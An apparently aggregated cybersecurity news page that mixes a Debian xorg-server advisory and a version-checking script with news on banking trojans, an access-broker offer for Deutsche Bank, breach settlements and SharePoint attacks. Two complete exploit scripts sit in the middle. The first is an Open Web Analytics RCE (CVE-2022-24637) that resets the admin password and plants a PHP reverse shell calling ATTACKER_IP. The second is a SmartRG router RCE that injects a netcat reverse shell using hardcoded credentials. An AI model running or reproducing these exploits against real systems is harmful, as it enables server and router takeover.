Thursday, January 16, 2025
Debian: DSA-5278-1: xorg-server Buffer Overflow Security Update

SUMMARY

It was discovered that a buffer overflow in the _getCountedString()
function of the Xorg X server may result in denial of service or
potentially the execution of arbitrary code.

For the stable distribution (bullseye), these problems have been fixed in
version 2:1.20.11-1+deb11u3.

We recommend that you upgrade your xorg-server packages.

For the detailed security status of xorg-server please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/xorg-server

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org

CVE: CVE-2022-3550 CVE-2022-3551
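As an added example (not part of the advisory), a Python re-implementation of dpkg's version ordering that checks installed xorg-server binaries against the fixed bullseye version 2:1.20.11-1+deb11u3; the package names and versions in the sample are constructed, and the binary package names (xserver-xorg-core and friends) are assumed to be what a host reports.

```python
"""Check installed xorg-server binaries against the DSA-5278-1 fixed version.

Added example, not part of the advisory: re-implements dpkg's version ordering
(epoch, upstream version, Debian revision; '~' sorts before end of string) so the
check needs no dpkg. Input lines mirror `dpkg-query -W -f '${Package}\\t${Version}\\n'`.
"""

FIXED_VERSION = "2:1.20.11-1+deb11u3"      # bullseye fix named in DSA-5278-1
ADVISORY_CVES = ("CVE-2022-3550", "CVE-2022-3551")


def _order(c):
    """Weight of one non-digit character in dpkg's ordering."""
    if c == "~":
        return -1          # '~' sorts before everything, even end of string
    if c.isalpha():
        return ord(c)      # letters sort before other characters
    return ord(c) + 256    # punctuation such as '+' or '.' sorts after letters


def _verrevcmp(a, b):
    """Compare an upstream-version or revision string the way dpkg does."""
    i = j = 0
    while i < len(a) or j < len(b):
        # Non-digit run: compare weights; a string that has ended weighs 0.
        while (i < len(a) and not a[i].isdigit()) or (j < len(b) and not b[j].isdigit()):
            ac = _order(a[i]) if i < len(a) else 0
            bc = _order(b[j]) if j < len(b) else 0
            if ac != bc:
                return -1 if ac < bc else 1
            i += 1
            j += 1
        # Digit run: compare numerically, ignoring leading zeros.
        while i < len(a) and a[i] == "0":
            i += 1
        while j < len(b) and b[j] == "0":
            j += 1
        first_diff = 0
        while i < len(a) and j < len(b) and a[i].isdigit() and b[j].isdigit():
            if not first_diff:
                first_diff = ord(a[i]) - ord(b[j])
            i += 1
            j += 1
        if i < len(a) and a[i].isdigit():
            return 1       # a has more digits left, so its number is larger
        if j < len(b) and b[j].isdigit():
            return -1
        if first_diff:
            return -1 if first_diff < 0 else 1
    return 0


def _split(version):
    """Split 'epoch:upstream-revision' into (epoch, upstream, revision)."""
    epoch = 0
    if ":" in version:
        epoch_str, version = version.split(":", 1)
        epoch = int(epoch_str)
    revision = ""
    if "-" in version:
        version, revision = version.rsplit("-", 1)
    return epoch, version, revision


def compare_debian_versions(v1, v2):
    """Return -1, 0 or 1 as v1 is older than, equal to or newer than v2."""
    e1, u1, r1 = _split(v1)
    e2, u2, r2 = _split(v2)
    if e1 != e2:
        return -1 if e1 < e2 else 1
    result = _verrevcmp(u1, u2)
    return result if result else _verrevcmp(r1, r2)


def is_patched(installed, fixed=FIXED_VERSION):
    """True when the installed version is at or above the fixed version."""
    return compare_debian_versions(installed, fixed) >= 0


def unpatched_packages(dpkg_query_output, fixed=FIXED_VERSION):
    """Return (package, version) pairs from 'Package<TAB>Version' lines that
    are still below the fixed version."""
    vulnerable = []
    for line in dpkg_query_output.splitlines():
        if not line.strip():
            continue
        package, installed = line.split("\t", 1)
        if not is_patched(installed.strip(), fixed):
            vulnerable.append((package, installed.strip()))
    return vulnerable


# Constructed sample (not from a real host): one binary still on the pre-advisory revision.
SAMPLE_DPKG_QUERY = (
    "xserver-xorg-core\t2:1.20.11-1+deb11u2\n"
    "xserver-common\t2:1.20.11-1+deb11u3\n"
    "xserver-xorg-legacy\t2:1.20.11-1+deb11u3\n"
)

if __name__ == "__main__":
    for package, version in unpatched_packages(SAMPLE_DPKG_QUERY):
        print(f"{package} {version} is below {FIXED_VERSION} "
              f"({', '.join(ADVISORY_CVES)} unfixed)")
```

On a real bullseye host, feed the output of `dpkg-query -W -f '${Package}\t${Version}\n' 'xserver-xorg*' xserver-common` to unpatched_packages; a backport-style revision such as 1+deb11u3~bpo11+1 correctly sorts below the fix because of the tilde rule.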

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for our Weekly Cybersecurity Newsletter Today.

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.

Malware Spotted on the Google Play Store Steals Banking Credentials & Intercepts SMS Messages

The Zscaler ThreatLabz team found the ‘Xenomorph’ banking trojan embedded in a lifestyle app in the Google Play store. The app’s name is “Todo: Day manager,” and it has more than 1,000 downloads.

The trojan, called ‘Xenomorph’, steals login information for banking applications from users’ devices. It can also intercept users’ SMS messages and notifications, giving it access to one-time passwords and multifactor authentication requests.

“Our analysis found that the Xenomorph banking malware is dropped from GitHub as a fake Google Service application upon installation of the app”, the Zscaler ThreatLabz team said.

“It starts with asking users to enable access permission. Once provided, it adds itself as a device admin and prevents users from disabling Device Admin, making it uninstallable from the phone.”

Xenomorph Infection Cycle

When first launched, the application connects to a Firebase server to obtain the URL of the banking malware payload.

The malicious Xenomorph banking malware samples are then downloaded from GitHub. The malware then contacts its command-and-control (C2) servers, located either through Telegram page content or through a static code routine, to fetch further commands and spread the infection.

Researchers say the malware will only download further banking payloads if the “Enabled” parameter is set to true. The banking payload also carries the Telegram page link, encoded with RC4.

Upon execution, the banking payload will reach out to the Telegram page and download the content hosted on that page.

The C2 domains are likewise RC4-encoded and stored within the code. The payload reports every loaded application to the C2 so that it can receive further instructions.

In one instance, if a legitimate application is installed on the infected device, the malware displays the fake login page of a targeted banking application.

Malware uploading all package information to receive commands

ThreatLabz also observed another programme, “Expense Keeper”, behaving in a similar manner. When this application is executed, its “Enabled” parameter is seen to be set to false.

The dropper URL for the banking payload could not be retrieved; ThreatLabz is working with the Google Security team on this.

Final Word

These banking phishing installers frequently rely on deceiving users into installing harmful programmes.

Users are urged to pay attention to the applications that are installed. A Play Store app shouldn’t urge users to install it from untrusted sources or side-load it. Finally, user awareness is crucial to thwarting various phishing tactics.

BREAKING: Access broker claims to have hacked Deutsche Bank, Offers access to its systems for sale on Telegram

A bad actor (0x_dump) claims to have hacked the multinational investment bank Deutsche Bank and is offering access to its network for sale online.

The security researcher Dominic Alvieri was one of the first experts to report the announcement published by the initial access broker on Telegram.

The IAB claims to have access to around 21,000 machines in the bank’s network, most of which are Windows systems. It also claims that the compromised machines were protected with a Symantec EDR solution.

“FTP , Shells , root , SQL-inj, DB, Servers.. We selling another network accss of a particular Bank, internal network ,we have DA, domain has around 21k machines configured most being windows Edr of machines are Symantec . Also internal network filters TCP,UDP,HTTP & HTTPS . Employees communicate between office chats services, there is file servers with more that 16TB of internal Data including share folder for every usr on the network & They also have flexcube DB.. We can provide VDI & VPN + all passwords of domain dump (with DA usr’s) Their funds is in B$ Price 7.5BTC We will request for proof that one can afford to avoid time wasters etc…” reads the announcement.

The seller claimed to have had access to the chat services used for internal communications, and also to file servers containing 16 terabytes of data.

The IAB is offering access to Deutsche Bank’s network for 7.5 Bitcoin, worth approximately $156,274.

The seller added that he is receiving a lot of requests for this offer:

“We are getting a lot of requests and it’s hard to filter out fake buyers so we ask for proof you can afford it or (share with us your @ on forums (we recommend we’ll known individuals for us to work easily)” added the seller.

Alvieri speculates that the IAB is the same broker who recently offered for sale access to the systems of the Australian health insurance Medibank.

Medibank is an Australian healthcare company based in Melbourne that provides private health insurance and health insurance solutions. Last month the insurer suffered a ransomware attack, which has caused a real earthquake in Australia; the government is now planning to tighten legislation on privacy and security requirements. In this incident the attackers were able to capture 9.7 million customer records of the health insurer.

The notice from the provider can be found here and states that criminals posted files containing Medibank customer data on a dark web forum. This data includes personal information such as names, addresses, dates of birth, phone numbers, email addresses, Medicare numbers for customers, in some cases passport numbers for international students, and some health benefits data.

Currently, the hack of the Australian healthcare company Medibank is shaking Down-Under, because the attacker is offering millions of patient records on the darknet. Shortly before that, the Australian telecom provider Optus was hacked and millions of customer records were siphoned off. And very recently, the same cybercriminals who attacked Medibank are offering Deutsche Bank data on the darknet. According to reports, the names of the hackers, who operate out of Russia, are known.

Deutsche Bank data on the darknet

If the report is true, there has also been a successful attack on Deutsche Bank, because according to the following tweet, the same group responsible for the Medibank hack could be the attacker offering access data to Deutsche Bank’s systems on the darknet. But that is not confirmed – Lawrence Abrams from Bleeping Computer told me that it is an alleged initial access broker, not the same hackers who stole the data from Medibank. It could, however, be the same actor that sold the ransomware gang access to the network (this is also unconfirmed and could be a scam).

We’ve launched a Facebook Page, and a group to help people stay informed of the latest security threats, trends and developments. We’d love it if you could Follow us and/or help with raising awareness in the group!

Open Web Analytics RCE 1.7.3 – Remote Code Execution

A vulnerability was discovered in Open Web Analytics by security researcher Yerodin Richards. The vulnerability, an RCE (remote code execution), affects versions <1.7.4.

# Exploit Title: Open Web Analytics 1.7.3 - Remote Code Execution (RCE)
# Date: 2022-08-30
# Exploit Author: Jacob Ebben
# Vendor Homepage: https://www.openwebanalytics.com/
# Software Link: https://github.com/Open-Web-Analytics
# Version: <1.7.4
# Tested on: Linux 
# CVE : CVE-2022-24637

import argparse
import requests
import base64
import re
import random
import string
import hashlib
from termcolor import colored

def print_message(message, type):
   if type == 'SUCCESS':
      print('[' + colored('SUCCESS', 'green') +  '] ' + message)
   elif type == 'INFO':
      print('[' + colored('INFO', 'blue') +  '] ' + message)
   elif type == 'WARNING':
      print('[' + colored('WARNING', 'yellow') +  '] ' + message)
   elif type == 'ALERT':
      print('[' + colored('ALERT', 'yellow') +  '] ' + message)
   elif type == 'ERROR':
      print('[' + colored('ERROR', 'red') +  '] ' + message)

def get_normalized_url(url):
   if url[-1] != '/':
      url += '/'
   if url[0:7].lower() != 'http://' and url[0:8].lower() != 'https://':
      url = "http://" + url
   return url

def get_proxy_protocol(url):
   if url[0:8].lower() == 'https://':
      return 'https'
   return 'http'

def get_random_string(length):
   chars = string.ascii_letters + string.digits
   return ''.join(random.choice(chars) for i in range(length))

def get_cache_content(cache_raw):
   regex_cache_base64 = r'\*(\w*)\*'
   regex_result = re.search(regex_cache_base64, cache_raw)
   if not regex_result:
      print_message('The provided URL does not appear to be vulnerable ...', "ERROR")
      exit()
   else:
      cache_base64 = regex_result.group(1)
   return base64.b64decode(cache_base64).decode("ascii")

def get_cache_username(cache):
   regex_cache_username = r'"user_id";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:5:"(\w*)"'
   return re.search(regex_cache_username, cache).group(1)

def get_cache_temppass(cache):
   regex_cache_temppass = r'"temp_passkey";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:32:"(\w*)"'
   return re.search(regex_cache_temppass, cache).group(1)

def get_update_nonce(url):
   try:
      update_nonce_request = session.get(url, proxies=proxies)
      regex_update_nonce = r'owa_nonce" value="(\w*)"'
      update_nonce = re.search(regex_update_nonce, update_nonce_request.text).group(1)
   except Exception as e:
      print_message('An error occurred when attempting to update config!', "ERROR")
      print(e)
      exit()
   else:
      return update_nonce

parser = argparse.ArgumentParser(description='Exploit for CVE-2022-24637: Unauthenticated RCE in Open Web Analytics (OWA)')
parser.add_argument('TARGET', type=str, 
                  help='Target URL (Example: http://localhost/owa/ or https://victim.xyz:8000/)')
parser.add_argument('ATTACKER_IP', type=str, 
                  help='Address for reverse shell listener on attacking machine')
parser.add_argument('ATTACKER_PORT', type=str, 
                  help='Port for reverse shell listener on attacking machine')
parser.add_argument('-u', '--username', default="admin", type=str,
                  help='The username to exploit (Default: admin)')
parser.add_argument('-p','--password', default=get_random_string(32), type=str,
                  help='The new password for the exploited user')
parser.add_argument('-P','--proxy', type=str,
                  help='HTTP proxy address (Example: http://127.0.0.1:8080/)')
parser.add_argument('-c', '--check', action='store_true',
                  help='Check vulnerability without exploitation')

args = parser.parse_args()

base_url = get_normalized_url(args.TARGET)
login_url = base_url + "index.php?owa_do=base.loginForm"
password_reset_url = base_url + "index.php?owa_do=base.usersPasswordEntry"
update_config_url = base_url + "index.php?owa_do=base.optionsGeneral"

username = args.username
new_password = args.password

reverse_shell = '<?php $sock=fsockopen("' + args.ATTACKER_IP + '",'+ args.ATTACKER_PORT + ');$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);?>'
shell_filename = get_random_string(8) + '.php'
shell_url = base_url + 'owa-data/caches/' + shell_filename

if args.proxy:
   proxy_url = get_normalized_url(args.proxy)
   proxy_protocol = get_proxy_protocol(proxy_url)
   proxies = { proxy_protocol: proxy_url }
else:
   proxies = {}

session = requests.Session()

try:
   mainpage_request = session.get(base_url, proxies=proxies)
except Exception as e:
   print_message('Could not connect to "' + base_url, "ERROR")
   exit()
else:
   print_message('Connected to "' + base_url + '" successfully!', "SUCCESS")

if 'Open Web Analytics' not in mainpage_request.text:
   print_message('Could not confirm whether this website is hosting OWA! Continuing exploitation...', "WARNING")
elif 'version=1.7.3' not in mainpage_request.text:
   print_message('Could not confirm whether this OWA instance is vulnerable! Continuing exploitation...', "WARNING")
else:
   print_message('The webserver indicates a vulnerable version!', "ALERT")

try:
   data = {
      "owa_user_id": username, 
      "owa_password": username, 
      "owa_action": "base.login"
   }
   session.post(login_url, data=data, proxies=proxies)
except Exception as e:
   print_message('An error occurred during the login attempt!', "ERROR")
   print(e)
   exit()
else:
   print_message('Attempting to generate cache for "' + username + '" user', "INFO")

print_message('Attempting to find cache of "' + username + '" user', "INFO")

found = False

for key in range(100):
   user_id = 'user_id' + str(key)
   userid_hash = hashlib.md5(user_id.encode()).hexdigest()
   filename = userid_hash + '.php'
   cache_url = base_url + "owa-data/caches/" + str(key) + "/owa_user/" + filename
   cache_request = requests.get(cache_url, proxies=proxies)
   if cache_request.status_code != 200:
      continue
   cache_raw = cache_request.text
   cache = get_cache_content(cache_raw)
   cache_username = get_cache_username(cache)
   if cache_username != username:
      print_message('The temporary password for a different user was found. "' + cache_username + '": ' + get_cache_temppass(cache), "INFO")
      continue
   found = True
   break
if not found:
   print_message('No cache found. Are you sure "' + username + '" is a valid user?', "ERROR")
   exit()

cache_temppass = get_cache_temppass(cache)
print_message('Found temporary password for user "' + username + '": ' + cache_temppass, "INFO")

if args.check:
   print_message('The system appears to be vulnerable!', "ALERT")
   exit()

try:
   data = {
      "owa_password": new_password, 
      "owa_password2": new_password, 
      "owa_k": cache_temppass, 
      "owa_action": "base.usersChangePassword"
   }
   session.post(password_reset_url, data=data, proxies=proxies)
except Exception as e:
   print_message('An error occurred when changing the user password!', "ERROR")
   print(e)
   exit()
else:
   print_message('Changed the password of "' + username + '" to "' + new_password + '"', "INFO")

try:
   data = {
      "owa_user_id": username, 
      "owa_password": new_password, 
      "owa_action": "base.login"
   }
   session.post(login_url, data=data, proxies=proxies)
except Exception as e:
   print_message('An error occurred during the login attempt!', "ERROR")
   print(e)
   exit()
else:
   print_message('Logged in as "' + username + '" user', "SUCCESS")

nonce = get_update_nonce(update_config_url)

try:
   log_location = "/var/www/html/owa/owa-data/caches/" + shell_filename
   data = {
      "owa_nonce": nonce, 
      "owa_action": "base.optionsUpdate", 
      "owa_config[base.error_log_file]": log_location, 
      "owa_config[base.error_log_level]": 2
   }
   session.post(update_config_url, data=data, proxies=proxies)
except Exception as e:
   print_message('An error occurred when attempting to update config!', "ERROR")
   print(e)
   exit()
else:
   print_message('Creating log file', "INFO")

nonce = get_update_nonce(update_config_url)

try:
   data = {
      "owa_nonce": nonce, 
      "owa_action": "base.optionsUpdate", 
      "owa_config[shell]": reverse_shell 
   }
   session.post(update_config_url, data=data, proxies=proxies)
except Exception as e:
   print_message('An error occurred when attempting to update config!', "ERROR")
   print(e)
   exit()
else:
   print_message('Wrote payload to log file', "INFO")

try:
   session.get(shell_url, proxies=proxies)
except Exception as e:
   print(e)
else:
   print_message('Triggering payload! Check your listener!', "SUCCESS")
   print_message('You can trigger the payload again at "' + shell_url + '"' , "INFO")

SmartRG Remote Code Execution: SR510n 2.6.13

A vulnerability was discovered in the SmartRG router by security researcher Yerodin Richards. The vulnerability, an RCE (remote code execution), affects versions 2.5.15 / 2.6.13.

# Exploit Title: SmartRG Router SR510n 2.6.13 - RCE (Remote Code Execution)
# Date: 13/06/2022
# Exploit Author: Yerodin Richards
# Vendor Homepage: https://adtran.com
# Version: 2.5.15 / 2.6.13 (confirmed)
# Tested on: SR506n (2.5.15) & SR510n (2.6.13)
# CVE : CVE-2022-37661

import requests
from subprocess import Popen, PIPE

router_host = "http://192.168.1.1"
authorization_header = "YWRtaW46QWRtMW5ATDFtMyM="

lhost = "lo"
lport = 80

payload_port = 81


def main():
    e_proc = Popen(["echo", f"rm /tmp/s & mknod /tmp/s p & /bin/sh 0< /tmp/s | nc {lhost} {lport} > /tmp/s"], stdout=PIPE)
    Popen(["nc", "-nlvp", f"{payload_port}"], stdin=e_proc.stdout)
    send_payload(f"|nc {lhost} {payload_port}|sh")
    print("done.. check shell")


def get_session():
    url = router_host + "/admin/ping.html"
    headers = {"Authorization": "Basic {}".format(authorization_header)}
    r = requests.get(url, headers=headers).text
    i = r.find("&sessionKey=") + len("&sessionKey=")
    s = ""
    while r[i] != "'":
        s = s + r[i]
        i = i + 1
    return s


def send_payload(payload):
    print(payload)
    url = router_host + "/admin/pingHost.cmd"
    headers = {"Authorization": "Basic {}".format(authorization_header)}
    params = {"action": "add", "targetHostAddress": payload, "sessionKey": get_session()}
    requests.get(url, headers=headers, params=params).text


main()

Cyber Today: Crypto Winter comes for FTX, oil and gas flow control vulnerability, images hide malware in PyPI

Crypto Winter comes for FTX

Earlier this week, crypto exchange Binance signed a letter of intent to acquire its rival FTX. This comes after FTX experienced a liquidity crunch and reached out to Binance for assistance. The letter did not bind Binance to complete the acquisition. However, less than a day after signing the deal, Coindesk’s sources say Binance appears highly unlikely to go forward with the acquisition. FTX’s loan commitments reportedly raise concerns about proceeding with the acquisition. Over the last three days, FTX saw over $6 billion in withdrawals. Additionally, Bloomberg’s sources say the U.S. Securities and Exchange Commission and Commodity Futures Trading Commission began investigating FTX’s relationship with its sister entity Alameda Research over potential mishandling of customer funds.

(TechCrunch)

Vulnerability found in oil and gas utilities

Researchers at the security company Claroty discovered a vulnerability in a widely deployed flow computer system used across oil and gas utilities. These computers calculate oil and gas volume and flow rates, essential for operations but also for billing. The “high-severity path-traversal vulnerability” would allow an attacker to take over a flow computer and remotely disrupt its ability to take accurate measurements, and could let an attacker obtain root access. ABB, the maker of the system, said it issued an advisory on the vulnerability to customers on July 14th and released an update to resolve the issue. The company also advised that “proper network segmentation” can adequately mitigate the vulnerability.

(The Record)

PyPI packages hiding malware in image files 

Another day, another piece of malware hiding in the Python Package Index. Researchers at Check Point Research sent out an advisory warning about a malicious package named “apicolor.” It contained an odd, non-trivial code section at the beginning of its installation script that downloaded a picture from the web. The installed package would then process the image and run the output generated by that processing using the exec command. Check Point notes that it regularly scans PyPI for malicious packages, but said this stood out as a “unique and distinct” approach. While many malicious packages in PyPI come as a result of copy-and-paste techniques, this approach shows that obfuscation methods on the index evolve rapidly.

(InfoSecurity Magazine)

Experian and T-Mobile settle on breaches

The two separately reached agreements with 40 US states to resolve data breaches from 2012 and 2015. Experian will pay the bulk of the settlement at $14 million, with $2 million paid by the wireless carrier. The 2012 breach at Experian involved an inside actor brought into the company through an acquisition. That individual sold data from over 3 million queries to third parties. The company did not alert regulators or impacted customers. The 2015 breach impacted Experian’s network, where T-Mobile stored customer credit applications, affecting 15 million people. Experian offered two years of free credit monitoring after that breach. The settlement will see it provide an additional five years, as well as free regular credit reports.

(The Register)

Twitter rolls out Blue verification

Twitter rolled out its expected update to its Blue subscription service for iOS, which now authenticates users as part of the $7.99 subscription. It’s unclear when it will arrive on Android, the web app, or in new markets. The company also tested out showing a gray check mark on select accounts labeling them as “Official,” although owner Elon Musk summarily announced that he “killed it.” Right now Blue only offers early access to new features, with Twitter promising longer video uploads, priority surfacing in search, and fewer ads as “coming soon.” 

(The Verge)

IPFS used for malware hosting

The distributed InterPlanetary File System, or IPFS, represents a building block of web3. It also turns out to be a great way to host malware. That comes from researchers at Cisco Talos, who found it being used by multiple malware families to retrieve initial malware stages. IPFS allows an attacker to efficiently make local content available on multiple nodes automatically and without cost. Because the hash tables for the files are maintained across IPFS gateways, it is resilient to takedowns without incurring a storage cost. The delivery vectors remain the same: attackers must still direct victims to an IPFS file. Cisco recommends that organizations not involved in web3 simply block access to all IPFS gateways.

(Security Week)

Lenovo fixes UEFI Secure Boot

Security researchers at ESET discovered that Lenovo mistakenly included an early development driver that would allow a user to change secure boot settings for the OS in its final production versions. This impacted 54 laptops across Lenovo’s ThinkBook, IdeaPad, and Yoga lines, letting an attacker deactivate UEFI Secure Boot. This system is meant to ensure malicious code can’t load and execute during the boot process. Without it, someone with access to a machine could bypass OS-level security protections and install malware that persists after an OS wipe. Lenovo released a BIOS fix to resolve the issue on all machines, except for one Ideapad model that reached end of life. 

(Bleeping Computer)

IBM plans to scale up quantum computers

IBM launched its new Osprey quantum processor, offering 433 qubits, 240% more than its last-gen Eagle processor from 2021. Big Blue’s current quantum roadmap ultimately plans to release a 4,000-qubit Kookaburra processor in 2025, preceded by a 1,121-qubit Condor processor next year and the 1,386-qubit Flamingo in 2024. The company also updated its Qiskit Runtime to make programming these larger chips a little easier, letting developers trade speed for a reduced error count, something that can be an issue in quantum systems. IBM also provided more details on its upcoming Quantum System Two, with a planned 2023 launch. This will integrate multiple quantum processors into a single system with high-speed links.

(TechCrunch)

Experian, T-Mobile US settle data spills for mere $16M

Experian and T-Mobile US have reached separate settlements with 40 states in America following a pair of data security breaches in 2012 and 2015. The settlement will net authorities $16 million, along with assurances it won’t happen again.

Experian will be bearing the largest brunt of the fine, with $14 million coming from the credit reporting company.

Led by attorneys general from Massachusetts and Illinois, the settlements stem from a pair of data breaches at Experian in 2012 and 2015, the latter of which T-Mo was caught up in.

The 2012 breach at Experian was revealed following a notification to the US Secret Service. Experian bought a company called Court Ventures, Inc., and all of its customers, one of whom was an identity thief. That crook has since pleaded guilty to wire fraud, identity fraud and other crimes, including falsely representing himself as a private investigator to gain access to Experian systems.

All the data collected by that single intruder was handed to other nefarious parties, who made over 3 million queries for personal information against data owned by CVI and Experian. 

Experian gave no notice to affected consumers or state authorities regarding the incident.

In 2015, the consumer credit reporting company was hit again. This time the attacker managed to gain access to a portion of Experian’s network where T-Mobile US stored data used to process customer applications. As a result of that attack, the data of 15 million people – including Social Security numbers, other ID numbers, name, address and birthdate – was stolen. 

T-Mo and Experian notified customers of that attack, and Experian offered free credit reporting services, as is usually the case when a large company has that volume of personally identifiable information stolen. 

Wrist, meet slap

Along with startlingly small financial penalties, Experian is being forced to provide an additional five free years of credit monitoring on top of two years it previously awarded in wake of the 2015 breach, as well as two free credit reports annually.

In addition, the credit bureau’s settlement included requirements that it maintain an incident response and data breach notification plan, develop an identity theft prevention program, and do proper due diligence in vetting people with access to data, including reassessing access after an acquisition. 

Experian was also told not to “misrepresent to its clients the extent to which [it] protects the privacy and security of personal information.”

T-Mobile US, meanwhile, was told to improve its vendor management oversight and develop a compliance program that ensures third parties with access to customer PII are storing it properly. 

Whether either company has learned from those breaches is unclear, especially in light of subsequent incidents at both companies. 

In 2020, Experian reported it had handed data including PII for 24 million South Africans to another individual who had falsely represented themselves in order to gain access. Despite assurances that the data had been recovered and destroyed, it later showed up online.

Last year, T-Mobile US was attacked again and 77 million customer records were stolen. T-Mobile paid out $550 million to settle that case. Startlingly, it’s T-Mo’s fifth acknowledged breach in four years.

To put its latest $2.43 million fine in perspective, the Un-Carrier reported a net income of $508 million in Q3 of this year. Experian, facing $13.67 million in fines, made around $6.2 billion in FY 22 [PDF].

“I am pleased to join my colleagues today in holding these companies accountable for their failures to protect the sensitive information of our residents,” said Massachusetts AG Maura Healey. 

VMware fixes three critical flaws in Workspace ONE Assist

VMware has released security updates to address three critical vulnerabilities impacting the Workspace ONE Assist product. Remote attackers can exploit the vulnerabilities to bypass authentication and elevate privileges to admin.

Workspace ONE Assist allows IT staff to remotely access and troubleshoot devices in real-time from the Workspace ONE console.

The first issue, tracked as CVE-2022-31685 (CVSSv3 9.8/10), is an authentication bypass flaw: an attacker with network access to Workspace ONE Assist may be able to obtain administrative access without needing to authenticate to the application.

The second issue, tracked as CVE-2022-31686 (CVSSv3 9.8/10), is a broken authentication method: an attacker with network access may be able to obtain administrative access without needing to authenticate to the application.

The third critical issue fixed by the virtualization giant is a broken authentication control tracked as CVE-2022-31687.

An attacker with network access may be able to obtain administrative access without the need to authenticate to the application.

The company addressed them with the release of Workspace ONE Assist 22.10 (89993) for Windows customers.

VMware also addressed two other issues, a reflected cross-site scripting (XSS) vulnerability tracked as CVE-2022-31688 (CVSSv3 score 6.4) and a session fixation vulnerability tracked as CVE-2022-31689 (CVSSv3 score 4.2).

The five issues were reported to VMware by Jasper Westerman, Jan van der Put, Yanick de Pater, and Harm Blankers of REQON IT-Security.

Hackers are using a years-old Microsoft vulnerability to attack governments around the world

Rewind to July 2019: hackers gained access to dozens of computer servers in Vienna and Geneva belonging to the United Nations. In one of the largest-ever breaches of U.N. information, the hackers had what was estimated as tens of thousands of staff records, contracts, databases, and passwords at their fingertips. After technicians discovered the attack, they had to work through at least two weekends to isolate more than 40 compromised computers. Twenty computers had to be completely rebuilt.

The hackers accessed the U.N.’s servers by exploiting a vulnerability in Microsoft SharePoint, a collaborative file-sharing software that acts as an internal network for hundreds of thousands of clients, many of them multinational corporations, banks, insurance companies, and government agencies. Microsoft had issued a fix for the SharePoint vulnerability earlier in 2019, but it’s unlikely those updates had been installed on the U.N.’s servers.

Rest of World spoke to four experts who said that hundreds of thousands of SharePoint users around the world could still be exposed to similar hacks if they’ve failed to install the software updates. Earlier this year, Iranian state-backed actors likely used the same vulnerability to target Albanian government servers over a period of several months. After the hack’s discovery, Albania broke off diplomatic ties with Iran.

“It’s fascinating that here we are, three and a half years after the patches have been available, and it’s still being used in the wild actively by threat actors,” Dustin Childs, head of threat awareness at Trend Micro’s Zero Day Initiative, told Rest of World about the SharePoint vulnerability. Zero Day Initiative pays researchers to detect weaknesses in widely used software, including CVE-2019-0604, the flaw that hackers have been using for more than three years to gain access to critical systems around the world.

Launched in 2001, Microsoft SharePoint is used by all types of organizations to store and share documents and make them accessible to anyone inside the organization. By 2017, Microsoft reported that more than 250,000 organizations installed SharePoint. Childs says that the number of servers running the software is in the millions.

Childs, who previously worked at Microsoft, said hackers can use CVE-2019-0604 to remotely access any information an organization stores in SharePoint. Because it gives them “pretty much everything,” said Childs, “it’s the type of bug people really like to use when they’re threat actors.” CVE-2019-0604 has become a known access point abused by hacker groups and state-based threat actors to enter internal systems in order to collect sensitive information or plant ransomware. 

Microsoft declined to answer specific questions from Rest of World about the number of SharePoint users who remain vulnerable to CVE-2019-0604. A company spokesperson simply replied, “To be fully protected from this vulnerability, Microsoft recommends that customers install all updates listed for their system.”

SharePoint’s widespread use by financial institutions, multinational companies, and government agencies has made it an appealing target for hackers all over the world. In 2019, the Canadian Center for Cyber Security and the Saudi National Cybersecurity Authority both reported attacks like the one against the U.N. The same year, notorious hacking group Emissary Panda, or APT27 — allegedly backed by the Chinese government — attacked SharePoint servers belonging to two governments in the Middle East by exploiting CVE-2019-0604, according to cybersecurity firm Palo Alto Networks. Also in 2019, Iranian state-backed actors used it to attack an unnamed Middle Eastern energy company. In 2020, unknown hackers struck two municipalities in the U.S., and the Australian government disclosed the SharePoint systems were used against multiple targets in the country. The Australian Cyber Security Centre described the attacks as “the most significant, coordinated cybertargeting against Australian institutions the Australian Government has ever observed.” In 2021, hacker gang Hello/WickrMe used it to launch several ransomware attacks.

Claire Tills, a senior research engineer at cybersecurity firm Tenable, told Rest of World, “Attackers favor flaws like this because they exist in products ubiquitous to enterprise environments and give them a foothold from which to launch post-exploitation activities.”

The SharePoint vulnerability has been so popular among hackers that the U.S. government’s Cybersecurity and Infrastructure Security Agency, or CISA, which is part of the Department of Homeland Security, included the SharePoint vulnerability in its list of the Top 10 Most Exploited Vulnerabilities between 2016 and 2019.

All of these attacks took place after Microsoft had already released patches for CVE-2019-0604 earlier in 2019. But in order to protect a system, all three patches — released in February, March, and April of 2019 — need to be installed. Cybersecurity experts speaking to Rest of World said that SharePoint users who installed the first and even the second update remain exposed if they haven’t realized they need to do the third. Ideally, a flaw like this would have been patched in one go, making life easier for users, who could simply apply one fix and move on. Instead, Microsoft fumbled the patching process, requiring three separate updates in as many months. And the patches themselves were flawed — within an hour after Microsoft released the first patch, the same researcher who discovered CVE-2019-0604 had already bypassed the patch. “We’ve got bad patches and unclear communication around them that are causing the industry to be slow adopting what are in a lot of ways really critical updates,” said Childs.

Kevin Beaumont, a cybersecurity expert who used to work at Microsoft, has been following the SharePoint vulnerability since 2019. At the time, Beaumont said this flaw had the potential to have a long-lasting impact. “I think this will be one of the biggest [vulnerabilities] in years. It would own a lot of enterprises. Like, a LOT,” he wrote on Twitter.

Beaumont’s prediction has come true. Even if organizations haven’t been hacked, those that have been using SharePoint since 2019 or before could be vulnerable if they haven’t installed all of the updates that have been released since then. For example, in 2020, Dhiraj Mishra, at the time a consultant at cybersecurity firm Cognosec, found that the Income Tax Department in India and the MIT Sloan School of Management were both exposed by the SharePoint vulnerability. After he reported his findings to the Indian Computer Emergency Response Team and MIT, the organizations patched it, Mishra wrote.

